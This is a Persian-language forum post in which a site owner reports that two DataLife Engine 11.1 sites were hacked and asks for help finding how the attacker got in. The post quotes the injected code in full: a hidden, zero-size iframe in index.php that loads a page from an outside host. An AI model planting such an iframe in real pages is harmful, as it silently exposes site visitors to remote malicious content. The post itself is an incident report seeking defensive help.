پرش به


تصویر

هک شدن دیتالایف 11.1

هک امنیت 11.1

  • لطفا وارد حساب کاربری خود شوید تا بتوانید پاسخ دهید
بدون پاسخ

#1 pouya47

pouya47

    عضو جدید

  • عضو سایت
  • ستاره
  • 13 ارسال

ارسالی 1397/05/06 ساعت 10:37

سلام

دو تا وب سایت با دیتالایف 11.1 داشتم که تازگی که بهشون سر زدم دیدم هک شدن :blink: .

هنوز نحوه ورود هکر رو پیدا نکردم ولی هکر اومده کد زیر رو به صفحه index.php تزریق کرده

<html><iframe src="http://mandon.nl/products/flash/01.html"marginwidth="0" marginheight="0" width="0" height="0" scrolling="no" border="0" frameborder="0"></iframe></html>

البته چون خوب تزریق نکرده سایت خطای php داده و از کار افتاده.

ظاهرا تزیق از طریق متد POST بوده چون لاگ خاصی نیافتاده.

اگه روش نفوذ رو پیدا کردم نحوه امن سازیش رو اینجا می‌گم.

البته ظاهرا این باگ در نسخه های جدیدتر نیست چون سایت های آپدیتم هک نشدن.

 

اگه کسی تجربه مشابه یا پیشنهادی برای پیدا کردن روش نفوذ داره اینجا بگه. ممنون :)


  • 0




0 کاربر در حال خواندن این موضوع است

0 کاربر، 0 مهمان و 0 عضو مخفی